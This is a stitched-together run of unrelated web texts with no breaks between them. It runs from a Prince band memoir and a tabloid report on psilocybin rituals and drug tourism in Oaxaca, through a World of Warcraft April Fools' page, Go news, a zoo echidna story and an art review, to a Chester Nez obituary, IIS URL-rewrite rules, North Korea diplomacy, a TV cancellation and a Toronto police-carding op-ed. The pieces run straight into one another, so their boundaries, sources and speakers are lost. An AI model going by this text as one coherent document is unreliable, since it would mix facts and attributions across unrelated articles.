Imagine being in his band. He could play every instrument better than the band. Except maybe the drums, but only because he didn't practice them enough. Still, he was a pretty good drummer.
On drum programming, he taught me to do it right, to do it perfectly and never cut corners. He was very strict about the timing. In this era, the mid-'90s, people used drum loops—breakbeats—all the time, and they can be tough to program. I heard a story that he was in the studio working on a song and he said, “I'll do it live.” He triggered the break every time for the whole song, and it was perfect.
We'd go on these arena tours, and every night he'd want to go to a small club and jam. The arena tours are totally rehearsed, like Broadway performances, with cues and lighting and all. Then we'd go into the Paradiso in Amsterdam and he would rip, sometimes for three or four hours, playing blues and funk, a ton of Sly and the Family Stone, Graham Central Station. We were in Ireland and Bono sat in after a show and sang “The Cross.” Chaka Khan sat in once. Whoever was around, wherever he went, it was an awesome party of talented people.
POST CONTINUES BELOW
He was a great band leader. I'd put him up there with Miles Davis in terms of getting a group of musicians together and whipping them into shape. That he could play all the instruments, and because, for the most part, he played every instrument on his records, meant he knew every part. He was hard on people, too. He'd embarrass you to the point where you wouldn't mess up. James Brown used to fine musicians when they messed up on stage. Prince wouldn't do that, but he'd ride you. I don't want to paint an ugly picture, but he was tough. You wanted to please daddy.
There was a rotating cast of sound men. He didn't like it when the sound guy would tweak the mix while the band was performing; Prince could hear the mix change. The tour manager would try to bring in big-name engineers to mix his shows. I remember they brought in a guy who had just gotten off tour with Celine Dion, or someone like that, this guy who looked a bit like Darius Rucker, at the time when Hootie and the Blowfish were big. We're doing a show at Paisley Park and halfway through, Prince says—over the PA—“Hootie, turn up my guitar.” Then, three quarters through, Prince says, “Hootie, you're fired.”
POST CONTINUES BELOW
I feel like I was protected because I was Michael Bland's boy—and also because I did my job right. When there was no sound guy, the crew was in charge of the mix. The drum tech would make sure the drums were loud enough, the keyboard tech had to make sure the keys were loud enough—everyone was fighting for space in the mix, just pushing the faders up. But he clued in that I knew what I was doing to some extent and would let me run the mix if there was no official sound man. One time, we were doing a Paisley Park show on the sound stage and I'm sitting there, behind the console, bobbing my head. At that time, I was really into funk—James Brown, Sly Stone, Punk—and so was Prince and the band. He was also super into hip-hop: Public Enemy, Snoop Dogg, Biggie. So I'm bobbing my head and the band was still jamming but Prince wasn't on stage. Then I look over and Prince was standing right next to me, bobbing his head in unison—that was a moment.
POST CONTINUES BELOW
L-R: Fafu, Michael Bland, Phil Solem, and John Fields
The band at the time, the New Power Generation, were so good, we would do shows and I remember Bruce Springsteen or John Cougar Mellencamp, someone like that, came through and said, “Can I use your band on a record?” And Prince said, “Can I sleep with your woman?” That's the kind of shit that he would say.
He would rent out movie theaters in the suburbs outside Minneapolis and invite the band and others to watch movies at midnight. He never invited me, but sometimes I'd get wind of it, and one time I went to see Casino with them on the night before Thanksgiving in 1995. He left halfway through. Walked out of Casino. He was a funny dude.
I remember one time it was just me and him working on the beats on the sound stage, and I used this squeak sound I'd made. I was in love with Public Enemy, and so I reversed this metallic squeak sound and slowed it way down. (I think he used it on Exodus). I played that sound and he got that face, that scrunched up woo face, and he picked up his bass and started ripping along with this thing that I'd programmed.
POST CONTINUES BELOW
I was definitely nervous around him, very new to the music industry and had heard so many stories about him, I wouldn't try to initiate conversation. It's funny, later on I was working with Bad Boy and people would ask me, “Why do you stop talking when Puff walks in the room,” and that's just because Prince was my training. Puffy's cool—he'll talk to anybody. But Prince, it was Jedi mind tricks. Working with him was like boot camp. I wasn't intimidated by anybody after that.
When I heard, I was in a restaurant with my daughter—she's home from school today—and I got a call from a friend of mine. It was loud in the diner and he said, “You hear that blah-blah-blah died?” I asked, “Who died?” He said, “Prince!” I told my daughter that we had to leave. We walked home and on the way it hit me, and I started crying.
POST CONTINUES BELOW
So many of the musicians I knew from that time in my life were of the highest caliber. He was beyond that. He's the most talented person I've ever met.
Margarito Mendoza still remembers the time, when he was just five, that his grandmother first fed him magic mushrooms.
In a ritual to celebrate surviving childhood, Margarito underwent an ancient shamanic custom in his Mexican hometown of San Jose del Pacifico.
The boy was fed the hallucinogenic psilocybe mexicana fungus by his family, who then 'guided him on his journey'.
'I was very scared at the visions that appeared to me, because I had no idea why I was seeing them,' he told MailOnline in an exclusive interview from the hostel where he now helps backpacking tourists on their own psychotropic experiences.
Margarito is a member of the Zapotec indigenous tribe in the southern Mexican state of Oaxaca, who according to local accounts have been using hallucinogenic mushrooms in rituals for thousands of years.
Baby faced: Alejandro Garces (pictured), three, from Mexico's Zapotec indigenous tribe, will be fed hallucinogenic mushrooms when he is subjected to the pagan 'coming of age' ritual in June
Ritual: The mind-bending fungi (pictured), which grow on the hills of Mexico's Oaxaca state, are used by shamans in rituals, including one which celebrates the passage of infancy into childhood
Tripping: Margarito (pictured), a member of the Zapotec indigenous tribe in the southern Mexican state of Oaxaca, was five when he was first fed magic mushrooms by his grandmother
'My family all took them at the same time and we went walking in the forest,' he said. 'I heard the trees speak me and the wind flowed before my eyes like a rainbow river'.
The psilocybe mexicana fungus which induces hallucinations, lack of rational judgement and a sense of wellbeing, grows in the mountains of Oaxaca state from May until September.
The mushrooms are seen as sacred by many in the community and are regularly used in ritual ceremonies conducted by local shamans, one of which involves celebrating the passage of infancy into childhood.
Three-year-old Alejandro Garces, whose parents run the town's oldest restaurant, will be fed the hallucinogenic mushrooms when he undergoes the ritual in June next year.
The boy, who is not even at school yet, will be dressed in the traditional garb of the Zapotec people and be taken to the hills above his village, where his parents will pick the mushrooms and eat them with their son.
When the hallucinogenic effect of the fungus begins to set in, they will begin chanting, giving thanks to their pagan gods for the latest member of their community.
'We don't see it as dangerous,' said his mother Lilia Gomez, who herself consumes the mushrooms on a regular basis.
Backpacker Chelsey (pictured) from Detroit, Michigan, said the mushrooms were the strongest she had ever taken, adding: 'I ended up hugging trees and screaming at the sky'
Dealer: Ben (pictured) is an Australian from Ballarat who has spent the past two years running the Sueño Atrapado hostel in San Jose del Pacifico
Growing fields: The psilocybe mexicana fungus which induces hallucinations grows in the mountains of Oaxaca state from May until September
Cultivation: The mushrooms (pictured), which induce frightening hallucinations, grow in the mountains of Oaxaca state from May until September
Hotspot: Around 200 backpackers a month currently arrive in San Jose del Pacifico (pictured), a three-hour journey through the coastal mountain range of Oaxaca state, in order to eat the mushrooms
'There is a lot of history and culture surrounding these sacred plants, and they link us directly with out ancestors.'
'The mushrooms are good for the soul,' said Eusebia Huajanab, a local witch doctor who conducts the ceremony following intense steam baths in her temazcal – a rudimentary sauna in which herbal tea is poured over red-hot stones for the purification of those inside.
'The steam and local herbs in it help to clear the mind and prepare for the voyage the mushrooms take you on,' she said.
The mushrooms are good for the soul... The steam and local herbs in it help to clear the mind and prepare for the voyage the mushrooms take you on Eusebia Huajanab, local witch doctor
The hallucinogenic fungus, although illegal for recreational use in Mexico, are nevertheless permitted for consumption in indigenous settlements where the prehispanic culture holds them as sacred medicine.
'They are the teacher,' said local woman Adela Ramirez, who sells the mushrooms preserved in honey in her shop to tourists for £40 per jar.
'We use them not only to feel closer to nature but also to ask deep questions and find solutions to life's many problems.'
As well as eaten fresh or preserved in honey, locals also consume the psychotropic drug in a tea after boiling the mushrooms in water or milk.
The town's fame for legal mushroom use has started to attract backpackers travelling in Mexico, particularly those passing through the popular nearby beach resort of Puerto Escondido.
A number of hostels have sprung up in San Jose that now sell mushrooms directly to the youngsters, much to the anger of the local residents.
'I don't even set foot in the town because the locals know I'm here to offer drugs to the young people who come,' said Ben, an Australian from Ballarat who has spent the past two years running the Sueño Atrapado hostel in San Jose del Pacifico.
Spiritual: 'The mushrooms are good for the soul,' said Eusebia Huajanab (pictured), a local witchdoctor who conducts mushroom ceremonies
Fury: Navarro Namur, a licensed shaman, doesn't like tourists selling the mushrooms and once told Ben the Australian he would cut his 'extremities from his torso' for doing business in San Jose
Psychedelic: Locals eat the mushrooms fresh, preserved in honey (pictured) and also consume the psychotropic drug in a tea after boiling the mushrooms in water or milk
Preparation: Shamans prepare their clients for a magic mushroom 'voyage' in rudimentary steam baths called temazcals (pictured) where they pour herbal tea over red-hot coals to 'help to clear the mind'
'I love drugs,' he told MailOnline, whilst smoking his fourth large hashish-filled joint of the morning, 'And they're an experience I want to offer everyone who comes here.'
Ben says he has been filled to capacity at his hostel every since he opened his doors, and that his clientele come from across the world to consume the mushrooms.
We welcome tourists to experience the full panorama of our culture, but we don't accept backpackers coming here and selling the drugs just so they can get high Navarro Namur, licensed shaman
He says the locals resent his involvement in the regional business of offering magic mushrooms to tourists, and that he has even received death threats from machete-wielding residents in broad daylight.
Navarro Namur, who told Ben he would cut his extremities from his torso last year while the pair scouted for clients as the Puerto Escondido bus pulled into town, says the Australian has no right to be doing business in San Jose.
'The local people here have thousands of years of history tied to these sacred plants,' he told MailOnline.
'We welcome tourists to experience the full panorama of our culture, but we don't accept backpackers coming here and selling the drugs just so they can get high.'
Navarro is a licensed shaman, and can thus legally conduct steam lodge rituals followed by mushroom 'voyages' for his clients.
'To us that's a very great disrespect of our traditions,' he said.
The dreadlocked Australian sells the mushrooms alongside a steam lodge experience, before recommending that his guests walk the mountain trails surrounding the town to 'get the most out of the experience'.
'We've had some pretty bad trips in this hostel,' he told MailOnline. 'One American girl ate them and then began to convulse horribly twenty minutes later, screaming about being attacked by giant insects.'
'I didn't want to take her to the hospital,' he said. 'I just sat her down away from the group and waited for her to calm down.'
'They're the most powerful mushrooms I've ever taken,' said Chelsey from Detroit, Michigan who allowed MailOnline to record her experience on camera.
After buying fresh mushrooms from a local dealer, Chelsey went walking on the mountain, where she spent the next few hours in what she described as a 'very intense experience'.
'I ended up hugging trees and screaming at the sky,' she said. 'I'm amazed I didn't take any of my clothes off, I really wanted to.'
It's estimated that around 200 backpackers a month currently arrive in San Jose del Pacifico, a three-hour journey through the coastal mountain range of Oaxaca state, in order to eat the mushrooms.
Wisdom: Adela Ramirez (pictured), who sells the mushrooms preserved in honey in her shop to tourists for £40 per jar, said: 'We use them not only to feel closer to nature'
Getting ready: A backpacker clears her mind inside a shamanic steam lodge before taking mushrooms which are technically illegal for recreational use in Mexico
Tourist: After buying fresh mushrooms from a local dealer, backpacker Chelsey (pictured) went walking on the mountain, where she spent the next few hours in what she called a 'very intense experience'
The region is also popular among birdwatchers, who come to observe the unique species endemic to the sierras of southern Mexico.
'The backpackers have caused a lot of problems in our town,' says Eusebia Huajanab. 'Where they have come, the drug dealers have followed.'
'The town used to be a happy community where people would share their belongings,' she says. 'Now the drug tourism has transformed it into a very commercial place.'
This is an April Fools article This article is a Blizzard April Fools' joke. Its content is not part of official Warcraft lore, but represents one of Blizzard's jokes.
On April 1st, 2004, Blizzard announced an April Fool's Joke that two-headed ogres would be a playable race in WoW.[1] They claimed that the two-headed ogre would comprise of two players, one controlling each head. The ogre's name would be a combination of the two player names, the example being JonnyBob. The players would have a separate "body" channel where they could discuss things amongst themselves, but whenever each player spoke it would appear as if coming from the two-headed ogre character as a single entity. One player would control the left half of the ogre and another would control the right, meaning the players would have to cooperate to succeed in the game. Whenever one player was logged off, its head would appear asleep.
After the impracticality of this play model was analyzed by the community, and once they realized the timing of the joke, fans laughed this off as another of Blizzard's silly (but quite creative) pranks.
Contents show]
Two-headed Ogres Edit
For factual information on two-headed ogres, see Ogre#Two Headed Ogres.
Choosing the Two-headed Player Race Edit
By selecting the Two-headed Ogre race, you are selflessly choosing to share your existence in World of Warcraft with another player. That is, you are staking claim to one half of the Ogre whole. As a Two-headed Ogre, you will have control of one head and one arm at all times. Your other half will be controlled by a second player automatically and permanently paired with you upon character creation. Each player residing in the Ogre body will be free to choose his or her own character class at creation, so for example, it is possible to have a Two-headed Ogre who is half Mage and half Warrior. It is also possible to have two halves of the same character class, depending on the random pairing. Two-headed Ogres serve the Horde, and in keeping with the theme of their inherent duality, their starting zone will be located near the Crossroads, which resides in the Barrens region of Kalimdor. The classes available to Two-headed Ogres are: Mage, Warrior, Priest, Druid, and Warlock. Sharing a single body with another player can produce an mutually enlightening, symbiotic relationship or a constricting, insanely frustrating experience depending on the player you are randomly matched with. Good luck to you!
Inter-Ogre Communication Edit
When the bond between two players is forged within a single Ogre body, that bond is permanent for better or worse. You and your second head will naturally be spending a lot of time together, and you may find one of your biggest challenges to be learning to cooperate and coexist with your lifelong soul mate. While you have full and absolute control of your head and its associated arm, both players will have simultaneous control of equipment and inventory management, both legs, and character locomotion. This can make it somewhat difficult to travel anywhere in particular if that particular destination at all differs in the mind of either player. Thus, good communication and well-defined roles are essential to the successful Two-headed Ogre. To facilitate this communication, each Two-headed Ogre will get its own [/body] channel so that both heads can better make personal decisions and confer privately about things like what quest to do next, what monster to target, and what direction to move in.
Double the Heads Means Double the Fun Edit
If both players are logged in at the same time, they are automatically added to the same party. While both heads share the same hit-point bar, each has a separate bar for mana, rage, etc., depending on class. Due to their girth and compact sturdiness, the total HP for a Two-headed Ogre is a combination of the HP values for each character class; when one head levels up, its additional HP are simply added to the Ogres total HP. The heads level up independently, so if one half of the Ogre is adventuring online more than the other, its likely that that head could move far ahead of the other head in level. When attacked by a monster, the body as a whole takes damage, and when the shared HP are depleted, both heads die. It is possible, however, for each head to receive individual buffs and debuffs. In addition to the standard abilities toolbar, each Two-headed Ogre player will have a secondary toolbar showing the spells/abilities of his or her other half. While one head cannot use the spells/abilities of the other, seeing this secondary toolbar allows the players to observe each other's usage habits and make suggestions. Clicking on any of the icons on this secondary toolbar will automatically spam the [/body] channel with a tip to use that particular spell or ability. The player of the other head can then weigh this suggestion and act appropriately. When one player is offline, that players head appears slumped and sleeping. The offline head will automatically do the /snore emote into the [/body] channel periodically. Also, your Two-headed Ogre will walk with a limp, as if the whole side of the body controlled by the offline head is asleep.
Naming conventions Edit
Each player will be given the opportunity to uniquely name his or her half of the Two-headed Ogre at character creation. However, outside of inter-Ogre communications, the world at large will see your character by a single name. This full name will be the combination of your Ogre's two uniquely named heads. For example, if one particular Ogre's left head is named "Jonny" while the right head is named "Bob," the full name of the Two-headed Ogre and the name attached to communications with the outside world will be "JonnyBob." Since both heads speak with this single name, there is no way for other players to know which of the heads within one body is speaking. Thus, it is important to discuss these external communications internally first to avoid appearing schizophrenic.
Two-headed Ogre Origins Edit
The Two-headed Ogres of Azeroth are a Horde-born byproduct of the Second War. Created as mutations of natural Ogres by Gul'dan, the massive Two-headed Ogres of the Horde quickly became known (and feared) for their ability to do a large amount of physical and magical damage in a short amount of time. Like the Orcs, Ogres originally entered Azeroth from Draenor, bringing with them a strong sense of tribal loyalty as well as a natural inclination toward one-upmanship. With the addition a second personality within one body, these traits were compounded in the two-headed variety of Ogre: they're fiercely loyal to the Horde, and they're fiercely competitive with themselves, with one head always trying to outdo the other.
Source Edit
The American Go Association (AGA) in December signed agreements with Korea to promote a new professional players' system in the U.S. AGA Board Chairman Andy Okun (right) signed the agreements with the Korea Baduk Association and the Korean go server TongYang Online (Tygem) December 19th in Seoul, Korea. “With the generous support of the KBA and Tygem, we are off to a great start,” Okun said. “These partnerships will help grow go in the U.S. and produce players who can win at the international level. This may be a long road, but with our partners' help it will be a successful finish.” Said KBA Secretary General Yang Jae-Ho, “The KBA wants the AGA to grow, and is hoping to see American professional players who defeat Asian players in an international tournament.” He added that “I hope to see even bigger tournaments than the Samsung and LG Cup in America.” And Tygem CEO Jeong In-Soo (left, in photo) said that “I sincerely hope TongYang Online and the AGA will lead the globalization of baduk through our cooperation.” Tygem agreed to provide $30,000 annually to fund the AGA's professional certification tournament, which will be broadcast exclusively via Tygem, which recently launched its English language website, and is seeking to expand its player base outside Asia. Under the KBA Memorandum Of Understanding (MOU) – which Feng Yun 9P has complained was negotiated without participation by American professionals – KBA, as part of its cultural mission to spread go around the world, has agreed to allow AGA-certified North American professionals to compete in five major Korean tournaments and to provide them with low-cost training. Kim Myung-Wan 9P, the KBA representative to the U.S., will continue to support the AGA's efforts, and will chair a committee designing the certification system and developing pro activities. Okun credited the two agreements to Kim's “hard work and perseverance.” Click here for the Tygem MOU.
Advertisement
Just when you thought echidna puggles couldn't get any cuter one shown being cared for at Taronga Zoo in Sydney has upped the charm factor.
A Taronga Zoo Wildlife Hospital Supervisor said it was only around 30 days old when it was brought in. Tiny, bald and has no spines, the puggle was found on a walking track at Anna Bay in the Hunter Region of New South Wales and taken to Taronga Zoo.
‘It's quite possible it fell out of it's Mum's pouch. It still would have been in Mum's pouch at that time. When they get a bit older – 10 to 15 days older – they are left in a burrow,' the Taronga Zoo Wildlife Hospital Supervisor explained in a zoo video.
Scroll down for video
Eating out of the palm of your hand: The little echidna puggle tucks into some milk for its lunch
A Taronga Zoo Wildlife Hospital Supervisor takes the puggle out of an esky where it can be kept at the right temperature
Snack time: A few drops of milk from a syringe is all the puggle needs to fill its stomach
Bath time: The Wildlife Hospital Supervisor at Toronga Zoo cleans the tiny puggle
‘Mum only comes back then every few days to feed the puggle. At the moment I only have to feed this one every two days.'
The puggle just sucked milk out of the palm of the Wildlife Hospital Supervisor's hand as the mother echida does not have any teats only milk patches which the baby puggle drinks from.
‘At the moment I'm keeping it in a small esky just to keep it at the right temperature. They actually have a very low temperature of 25-27 degrees. The esky is really good at keeping that constant temperature,' the Wildlife Hospital Supervisor said.
The puggle is bathed and cleaned daily. At this age it is tiny, bald and has no spines
At the moment the small puggle only has to be fed every two days at the most
It'll take a few months before it will look like an echidna. They normally don't come out of the burrow for six to sevens months.
‘It still needs a lot of tender loving care for the next few months yet,' she said.
Being monotremes, echidnas produce young from eggs which are hatched outside their body, in the same way as birds and most reptiles.
Young echidnas are often not fully weaned until they are at least several months old
Although they begin to eat termites and ants soon after leaving the pouch, young echidnas are often not fully weaned until they are several months old.
Echidnas evolved between 20 and 50 million years ago, descending from a platypus-like creature. This ancestor was aquatic, but echidnas adapted to life on land.
Canadian painter Kris Knight is currently showing at MULHERIN + POLLARD, New York (through May 5). With “Secrets Are The Things We Grow” the artist paints a cast of characters who consciously conceal aspects of themselves from those around them. They hide truths of who they are, where they come from and whom they love. They fear shame, rejection, gossip and embarrassment. They whisper stories but never want the story to be about them… Image credits: Blue Ribbon 18″ x 24″ More images…
Secrets have roots, they have currency, they accumulate and grow with time; some are short lived, while others haunt generations. Knight's character's front, they put on airs, and they pass; some bluff while others reveal their confessions without saying a word… Image credits: Bear Skin 30″ x 30″ More images…
Image credits: Two Stripe Captain 30″ x 40″
Stemmed from personal stories, these young men isolate themselves from those around them. Some of Knight's portraits appear as islands, while other paintings portray the bonds formed when secrets are revealed to those held closest. Within these portraits are references to the garden and exercises in pattern work representing how secrets are rooted and grow with time and sometimes take over. These ambiguous portraits depict the balancing act of deeply holding secrets but longing to let them go. Image credits: Laurel Island 60″ x 48″ More images…
Image credits: Faberge 36″ x 48″
Image credits: Home Cuts 30″ x 40″
LIFE in the Marine Corps came easily to Chester Nez. He was used to loping long miles, sleeping in the open air, and to the hard work of herding sheep and goats under the cloud-studded turquoise skies of the New Mexico Checkerboard. He took danger in his stride too: as a Navajo warrior and protector, he wanted to defend his country and make his family proud. He liked the plentiful food, after a childhood when he often was “hurt by hunger” as his language, verb-rich and adjective-poor, put it. And, in his uniform, he could visit bars that banned native Americans.
Some things bothered him: looking people in the eye (disrespectful), shouting (even more so) and the careless treatment of cut hair (a dangerous weapon to enemies). Navajo religion forbids contact with the dead, and the battlefield stench of corpses spooked him. To keep the spirits of the dead at bay, he would fill his mind with thoughts of beauty, mutter a Navajo prayer, and touch the buckskin medicine bag which hung at his neck, with its blessed corn pollen and tiny, secret souvenirs.
Get our daily newsletter Upgrade your inbox and get our Daily Dispatch and Editor's Picks.
His first name was not Chester, nor was his surname Nez. The real ones had somehow got lost at boarding school, where the white world tried to civilise the rangy eight-year-old, born to a mother from the Black Sheep Clan and a father of the Sleeping Rock People. They made him speak English, a language he had never heard. To get rid of the dirty gobbledegook he insisted on using, the matron brushed his teeth with bitter Fels-Naptha soap.
In vain. Nothing could take away his Navajo–part (though he did not know it) of a language family so complicated that linguistics needs special terms to describe it. Verbs do most of the work, agglutinated with suffixes and prefixes, in seven modes (including the usitative, iterative and optative), 12 aspects, such as the semelfactive (a half-completed action), and ten sub-aspects, including the completive and the semeliterative (a single repetition). It has four combinations of tones, plus glottal and aspirated stops. A shift in any of them can change a word's meaning completely.
War of words
As America struggled to stem the Japanese advance across the Pacific following the disaster of Pearl Harbour, military codes—cumbersome and weak—were proving a fatal weakness. But Philip Johnston, a missionary's son raised on a Navajo reservation, hit on the idea of using a language that the Japanese could not crack. Native American tongues had been used for battlefield messages in the first world war, (Hitler had even dispatched spies to America in the 1930s to study them in case they would be used again). But Navajo had not been written down, and almost no outsiders spoke it fluently.
Moreover, to be safe, the code that Mr Nez and his fellow-Navajo volunteers in the secret 382nd Platoon helped devise was a complex one. The letter A was represented by any of three Navajo words: “ant”, “apple” or “axe”. Common military terms had words of their own: a fighter plane was a hummingbird, (da-he-tih-hi), a battleship was a whale (lo-tso), a destroyer a shark, (ca-lo). A hand grenade was a potato, and America was Ne-he-mah (“our mother”). The Japanese did eventually capture (and torture) a Navajo—but he was not a code-talker. He could not make head or tail of the messages.
Marine commanders were initially sceptical. But a message that took an hour to encrypt, transmit and decrypt on the existing mechanical Shackle system could be transmitted orally by code-talkers in just 40 seconds. Even America's own code-crackers failed to break it.
On November 4th 1942 (the most frightening day of his life, he later recalled) he went into action on Guadalcanal, toting a hand-cranked radio, the size of a shoebox and weighing 30 pounds (nearly 14 kilos). His first message was: “Enemy machine gun nest on your right. Destroy.” The shells rained down as ordered. He was to serve in key battles of the Pacific war: Bougainville, Guam, Peleliu and Angaur. Everywhere the marines fought, Navajo code-talkers, under fire, hoarse, tired and thirsty, were vital in victory, directing fire, calling up reinforcements, evacuating the wounded, and warning of enemy movements.
Gratitude came slowly. Many code-talkers (unable to talk about their secret wartime work) ended up penniless drunks. When Private First Class Chester Nez applied for a civilian identity card in 1945, an official took pleasure in reminding him that he was not a full citizen and could not vote (that did not come until 1948). He suffered from what would now be called post-traumatic stress disorder, fighting it, successfully, with traditional Navajo healing ceremonies. He started an art course, but ran out of cash (the University of Kansas awarded him his degree in 2012), and worked for 25 years painting walls and murals at a veterans' hospital in Albuquerque. Only after 1968, when the code-talkers' story was declassified, did the fame and honours begin—a bit embarrassingly, he said—to flow.
He mourned the suffering and injustice of his people's past, but insisted that the Navajo story was ultimately of triumph, not sorrow. And his own life had been “100%”. But it did bother him that his country had tried to stop him speaking Navajo, when it had proved so useful.
A few months ago Mads posted some IIS URL Rewrite rules in a post titled “URL rewrite and the www subdomain”.
Years ago, when I rewrote this site in ASP.NET MVC, I found URL rewriting to be invaluable. Some URLs in the new version of this site became obsolete. For example, an efficient Gravatar implementation from the Web Helpers library replaced an Identicon HTTP handler. I wanted to explicitly purge the handler from search engine results with an HTTP 410 response.
<rule name="obsolete identicon" stopProcessing="true"> <match url="/IdenticonHandler.ashx" /> <action type="CustomResponse" statusCode="410" statusReason="Gone" statusDescription="…" /> </rule>
Instead of having 4 different RSS feeds for different sections of the site, I collapsed all content into a single RSS feed. All previous RSS endpoints now redirect to FeedBurner.
<rule name="article rss feed" stopProcessing="true"> <match url="articles/rss.aspx" /> <action type="Redirect" url="http://feeds.feedburner.com/OdeToCode" redirectType="Permanent" /> </rule>
To make routing a bit easier, I wanted to avoid processing URLs like /articles or /blogs in ASP.NET and redirect those requests to to /articles/list with rules like the following.
<rule name="avoid articles directory" stopProcessing="true"> <match url="articles[/]?$" /> <action type="Redirect" url="articles/list" redirectType="Permanent" /> </rule>
A tricky scenario was preserving some endpoints that used the classic ASP.NET page name of “default.aspx” in the URL. For example, the list of all blog posts used to exist at /blogs/all/default.aspx, but I wanted to redirect these requests and avoid the page name.
<rule name="default page" stopProcessing="true"> <match url="(.*)default.aspx" /> <conditions> <add input="{REQUEST_URI}" negate="true" pattern="-default.aspx$" /> </conditions> <action type="Redirect" url="{r:1}" redirectType="Permanent" /> </rule>
The negation condition in the above rule avoids redirecting requests for blog posts with default.aspx in the title of the post, of which there are 1 or 2.
Finally, I use a web.config transformation to add an additional rule in production to enforce the canonical host name of odetocode.com.
<rule name="Canonical Host Name" stopProcessing="true" xdt:Transform="InsertBefore(/configuration/system.webServer/rewrite/rules/rule[1])"> <match url="(.*)" /> <conditions> <add input="{HTTP_HOST}" negate="true" pattern="^odetocode\.com$" /> </conditions> <action type="Redirect" url="https://odetocode.com/{R:1}" redirectType="Permanent" /> </rule>
One post I found useful when developing these rules was RuslanY's “10 URL Rewriting Tips and Tricks”.
On Saturday morning Secretary of State Rex Tillerson said that the U.S. has engaged in direct communication with the government of North Korea, it's the first time such talks have been publicly acknowledged. His first priority is to deescalate the high tensions between the country's leader Kim Jong-un and President Donald Trump after the two have engaged in a war of words as of late, but he failed to issue criticisms of Trump's bombastic threats.
After Tillerson was questioned on how he would engage with North Korea's Kim, and the rising threat between two nuclear powers, he replied, "we are probing, so stay tuned," according to the New York Times.
Advertisement:
"We ask, 'would you like to talk?' We have lines of communications to Pyongyang — we're not in a dark situation, a blackout. We have a couple, three channels open to Pyongyang," he continued.
Tillerson answered questions during a news conference in Beijing, China, after having met with China's top leaders, but did not indicate if North Korea had responded to U.S. communication efforts, the Times reported.
"We can talk to them," Tillerson said. "We do talk to them."
When asked if the communication lines ran through China he shook his head and said, "directly," according to the Times. "We have our own channels."
Tillerson's top concern is finding ways to decrease tensions between Washington and Pyongyan, but he also seemed to place more blame on the North Korean leader, downplaying the impact of Trump's incendiary rhetoric.
"The whole situation is a bit overheated right now," he said. "If North Korea would stop firing its missiles, that would calm things down a lot."
Advertisement:
He didn't issue a direct criticism of the president, despite his threats to "totally destroy" the entire country of North Korea during his United Nations speech, and tweeted just last weekend that the country "won't be around much longer."
The secret communications somewhat draw comparisons to the Barack Obama administration's efforts to achieve a nuclear agreement with Iran, but Tillerson made a clear difference between the two, and reiterated the Trump administration's unrest with the current nuclear deal with Iran.
"We are not going to put together a nuclear deal in North Korea that is as flimsy as the one in Iran," Tillerson said.
The news comes after the network picked up two other shows from independent producers Warner Bros. Television.
2 Broke Girls has run its course at CBS.
The network has canceled the comedy after six seasons.
On the bubble for the first time, the Warner Bros. Television-produced multicam starring Kat Dennings and Beth Behrs was left off of CBS' 16-show renewal in March. The Michael Patrick King effort, while a critical punching bag, had been a sturdy performer for CBS. In its sixth season, the restaurant comedy averaged a 1.9 among adults 18-49 and 7 million total viewers. Sources say a short 13-episode order had been discussed for the series, which had been used on Mondays and Thursdays, but ultimately the network's lack of an ownership proved to be its demise.
Network ownership has proven to be one of the biggest storylines this upfront season as broadcasters look to have a financial stake in programming amid dwindling ratings and ad dollars.
Dennings posted a note from herself and Behrs on social media late Friday about the cancelation: “We've had a wonderful 6 seasons as Max and Caroline and we thank all of you for watching and enjoying it along with us. We are so proud of our time on 2 Broke Girls and of all the things this experience has given us, the most treasured is our lifelong friendship.”
The decision to cancel 2 Broke Girls comes as CBS has a pretty stocked comedy inventory. The network has already handed out series orders for three new half-hours, including two produced by WBTV. Among them: a straight-to-series pickup for Big Bang Theory prequel Young Sheldon that is expected to air behind the flagship on Thursdays.
Keep track of all the broadcast renewals, cancelations and series pickups with THR's handy scorecard.
× Expand Jonathan Goldsbie Chief Mark Saunders has reportedly received legal advice against destroying carding data, but what risks so outweigh the public interest that his civilian overseers on the police board are prepared to court community anger on the issue?
Journalist and community activist Desmond Cole added another experience to his history of interactions with police when officers escorted him out of a meeting of the Toronto Police Services Board on Thursday, April 20.
Cole was staging a one-person act of civil disobedience, refusing to move from the deputant's seat at the board's regular monthly meeting until members acted on his demand to destroy information gathered through the practice of carding and stored indefinitely in police databases.
It's one major piece of business left unfinished when Ontario introduced its regulation to control carding last spring. By failing to give direction, the province left it up to individual police boards and chiefs to decide what to do with data collected through the practice (some 1.8 million contacts between 2008 and 2012), which has disproportionately targeted Black youth and members of other marginalized groups.
The issue Cole raised - that innocent people who have not been the targets of criminal investigations must not be criminalized or subjected to unfounded police inquiries due to information about them gathered from carding that is stored in police databases - has taken on added significance in recent weeks.
A Star report on Ontario's anti-terrorism plan suggests that data gathered through carding should form part of the information that local police forces are to share with other police agencies, including the RCMP and the OPP's anti-terrorism unit.
Former chief Bill Blair was all for destroying the info. However, current police Chief Mark Saunders has decided to renege on Blair's decision, and the police board is clearly inclined to go along with him.
What data to retain, for what reason and for how long are questions that have been part of the board's effort to deal with carding since 2013.
After refusing for the longest time to budge, Blair did a U-turn. In his last report on the subject to the board on April 14, 2015, days before stepping down, Blair announced publicly that any data gathered from community engagements "will be available for investigative purposes for a period of one year from date of entry," and no longer.
Blair laid out a detailed process for the retention and destruction of future carding information. As a rule, he proposed to keep data for a year; any retention beyond that was to be based on strict criteria. He also announced a process for handling historical or "legacy" data.
His report said that such data "will be sequestered from the investigative database for a period of one year." A day after the anniversary, each such record will be "purged from the Service's database" if it has not been used or if it "is not required for any ongoing historic investigations or judicial proceedings."
One highly placed source at police headquarters says that board chair Andy Pringle would like nothing more than to purge the carding data, but that board lawyers have "forbidden" it.
Since the lawyers' advice has not been divulged to the public, we do not know what risks so outweigh the public interest that the board is prepared to continue to court community anger and disrespect on the issue.
I find this bizarre. The board does not report to lawyers; it is for the board to decide how it will use legal advice.
We do know, though, that Chief Saunders has never been in favour of giving up either the carding data or carding itself. How convenient, then, that the board obtained legal advice that supports his position, which is consistent with the national security lens through which he apparently views his job. To be sure, Saunders is one of a handful of senior officers considered an expert in national security.
Saunders built his career largely in the underbelly of policing, working undercover and in homicide. He spent very little time in community-based policing. It's not surprising, then, that his justification of carding and all the practices related to it is informed by the needs of criminal investigations.
While he may have had to give up the exercise of random carding due to the provincial regulation, he's clearly not prepared to give up its ill-gotten fruits - even though there is no legal or regulatory basis for keeping this information.
Alok Mukherjee served as chair of the Toronto Police Services Board from 2005 to 2015. He is a distinguished visiting professor at Ryerson University.
news@nowtoronto.com | @nowtoronto
“Who the hell is Rise Against?” ~ The average person on Rise Against
